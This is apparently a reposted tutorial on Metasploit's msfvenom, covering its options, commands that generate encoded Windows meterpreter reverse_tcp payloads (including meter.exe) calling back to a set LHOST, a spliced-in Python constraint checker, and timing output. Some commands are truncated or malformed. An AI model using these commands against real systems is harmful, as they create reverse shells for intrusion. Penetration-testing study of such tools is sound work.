Usage of msfvenom in Metasploit

Source: Internet
Author: User

Options:
-p, --payload [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type]      List a module type, for example: payloads, encoders, nops, all
-n, --nopsled [length]        Prepend a nopsled of [length] size on to the payload
-f, --format [format]         Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-e, --encoder [encoder]       The encoder to use
-a, --arch [architecture]     The architecture to use
    --platform [platform]     The platform of the payload
-s, --space [length]          The maximum size of the resulting payload
-b, --bad-chars [list]        The list of characters to avoid, for example: '\x00\xff'
-i, --iterations [count]      The number of times to encode the payload
-x, --template [path]         Specify a custom executable file to use as a template
-k, --keep                    Preserve the template behavior and inject the payload as a new thread
-h, --help                    Show this message
msfvenom -p <PAYLOAD> -e <ENCODER> -f <output format> filename
Eg:
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/syst LHOST=<our ip> | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -f exe > meter.exe

On the rapid7 site there is also an example of using the script, namely the creation of a payload (reverse_tcp):

fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
buf =

This creates a payload in ruby format with the shikata_ga_nai encoder, which is chosen automatically from the encoder ranking; -s 480 indicates that the output must not be larger than 480 bytes, and finally LHOST=192.168.0.120 sets the LHOST variable for use with the payload.
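The -s and -b constraints above are only useful if the generated buffer is actually checked against them. The following script is an added example (not part of the original page or of Metasploit): it parses msfvenom's ruby-format output back into bytes and reports any violation of a size limit or bad-character list. The sample buffer is constructed for illustration and is not real shellcode.

```python
import re

# Constructed sample in the shape of `msfvenom -f ruby` output (not real shellcode).
SAMPLE_RUBY = '''buf =
"\\xd9\\xf7\\xd9\\x74\\x24\\xf4\\xbb\\x9c" +
"\\x31\\xc9\\xb1\\x50\\x00\\x5f\\x18\\xff"
'''

# Matches one \xNN escape as printed by msfvenom's ruby/perl/c formats.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_ruby_buf(text):
    """Return the raw bytes encoded in a `buf = "..." + "..."` block."""
    body = text.split('=', 1)[1]            # drop the `buf =` prefix
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(body))


def parse_bad_chars(spec):
    """Parse a -b style list such as '\\x00\\xff' into a set of byte values."""
    return {int(h, 16) for h in HEX_ESCAPE.findall(spec)}


def check_constraints(payload, max_size, bad_chars):
    """Mirror the -s (space) and -b (bad-chars) options: return a list of problems."""
    problems = []
    if len(payload) > max_size:
        problems.append(f"size {len(payload)} exceeds -s {max_size}")
    for offset, b in enumerate(payload):
        if b in bad_chars:
            problems.append(f"bad char \\x{b:02x} at offset {offset}")
    return problems


if __name__ == "__main__":
    buf = parse_ruby_buf(SAMPLE_RUBY)
    for p in check_constraints(buf, 480, parse_bad_chars('\\x00\\xff')):
        print(p)
```

Run against the real output of the command above (for example `msfvenom ... -f ruby > out.rb`) the same checks confirm that the encoder honoured the space limit and avoided every listed byte.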

A comparison of execution speed is also given.
The first example shows the execution time of msfvenom, while the second shows that of msfpayload and msfencode together:

fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1>/dev/null
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
real 0m2.744s
user 0m2.380s
sys  0m0.367s
fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R | ./msfencode -c 3 1>/dev/null
[*] x86/shikata_ga_nai succeeded with size 321 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 348 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 375 (iteration=3)
real 0m3.070s
user 0m4.227s
sys  0m0.778s
